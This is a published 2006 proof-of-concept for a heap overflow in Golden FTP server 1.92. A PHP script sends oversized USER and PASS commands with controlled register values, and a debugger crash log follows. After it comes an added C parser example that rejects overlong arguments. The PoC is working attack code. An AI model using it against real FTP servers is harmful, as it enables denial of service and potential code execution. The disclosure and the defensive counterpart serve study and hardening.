Golden FTP server 1.92 (USER/PASS) Heap Overflow PoC
Source: http://retrogod.altervista.org Author: rgod Published: 2006-12-12

<?php
#23.07 03/12/2006
#Golden FTP server 1.92 (freeware edition) USER/PASS heap based overflow poc
#by rgod retrog at alice dot it
#site: http://retrogod.altervista.org

#download link: http://www.download.com/3000-2160_4-10375602.html?tag=sd.EXAF

$host="192.168.1.3";
$port="21";

$junk="";
for ($i=1; $i<=8095; $i++){
$junk.="a";
}

$eax="AAAA";
$eax[0]=chr(ord($eax)-20); //to have the wanted eax
$ecx="BBBB";

$junk.=$ecx.$eax;

$sock=@fsockopen($host,$port,$errno, $errstr, 10);
if (!$sock){
die("\nnot connected!\n");
}
else {
fgets($sock,80);
fputs($sock,"USER ".$junk."\r\n");
fgets($sock,80);
fputs($sock,"PASS ".$junk."\r\n");
fclose($sock);
}
/*
...
17:07:28.144 pid=0870 tid=1128 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
----------------------------------------------------------------
EAX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00EBFD64: C4 9D A6 00 F4 BF A5 00-00 9F A6 00 BC FD EB 00
ESP=00EBFD1C: 00 00 00 00 58 FD EB 00-61 24 41 00 80 9F A6 00
EBP=00EBFD20: 58 FD EB 00 61 24 41 00-80 9F A6 00 F4 BF A5 00
ESI=004B9F04: 2D 41 41 41 00 00 00 00-00 00 00 00 00 00 00 00
EDI=004B9F00: 42 42 42 42 2D 41 41 41-00 00 00 00 00 00 00 00
EIP=004A9B74: 8B 00 8B 12 E8 5F F6 FD-FF 0F 94 C0 83 E0 01 5B
--> MOV EAX,[EAX]
----------------------------------------------------------------

17:07:28.254 pid=0870 tid=1128 Thread exited with code 0
...
*/
?>
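The server-side counterpart to the PoC above, as an added example that is not from the original post or from Golden FTP's code: a C command-line parser that checks the USER/PASS argument length before anything is copied. The 255-byte limit (`FTP_ARG_MAX`), the function names and the choice of 500/501 as return values are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define FTP_ARG_MAX 255 /* assumed policy limit, not a Golden FTP value */
enum { FTP_OK = 0, FTP_ERR_SYNTAX = 500, FTP_ERR_ARG = 501 };

/* Split one received line ("VERB argument\r\n", not NUL-terminated).
 * Nothing is copied into arg until its length has been checked. */
int ftp_parse_line(const char *line, size_t len,
                   char verb[5], char *arg, size_t arg_size)
{
    size_t i, vlen = 0, alen;
    if (arg_size == 0) return FTP_ERR_SYNTAX;
    arg[0] = '\0';
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                                  /* drop line terminator */
    while (vlen < len && line[vlen] != ' ')
        vlen++;
    if (vlen < 3 || vlen > 4) return FTP_ERR_SYNTAX;
    for (i = 0; i < vlen; i++) {                /* verb: 3-4 ASCII letters */
        char c = line[i];
        if (c >= 'a' && c <= 'z') c = (char)(c - 'a' + 'A');
        if (c < 'A' || c > 'Z') return FTP_ERR_SYNTAX;
        verb[i] = c;
    }
    verb[vlen] = '\0';
    if (vlen == len) return FTP_OK;             /* verb without argument */
    alen = len - vlen - 1;
    if (alen > FTP_ARG_MAX || alen >= arg_size) return FTP_ERR_ARG;
    for (i = 0; i < alen; i++) {                /* no NUL or control bytes */
        unsigned char c = (unsigned char)line[vlen + 1 + i];
        if (c < 0x20 || c == 0x7f) return FTP_ERR_ARG;
    }
    memcpy(arg, line + vlen + 1, alen);
    arg[alen] = '\0';
    return FTP_OK;
}

/* Constructed input: "USER " + n filler bytes + CRLF, parsed as above. */
int demo_user_len(size_t n)
{
    static char line[9000];
    char verb[5], arg[FTP_ARG_MAX + 1];
    if (n + 7 > sizeof line) return -1;
    memcpy(line, "USER ", 5);
    memset(line + 5, 'a', n);
    memcpy(line + 5 + n, "\r\n", 2);
    return ftp_parse_line(line, n + 7, verb, arg, sizeof arg);
}
```

An argument of 8103 bytes, the length the PoC sends (8095 filler bytes plus two 4-byte values), is refused with 501 before any copy takes place.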



 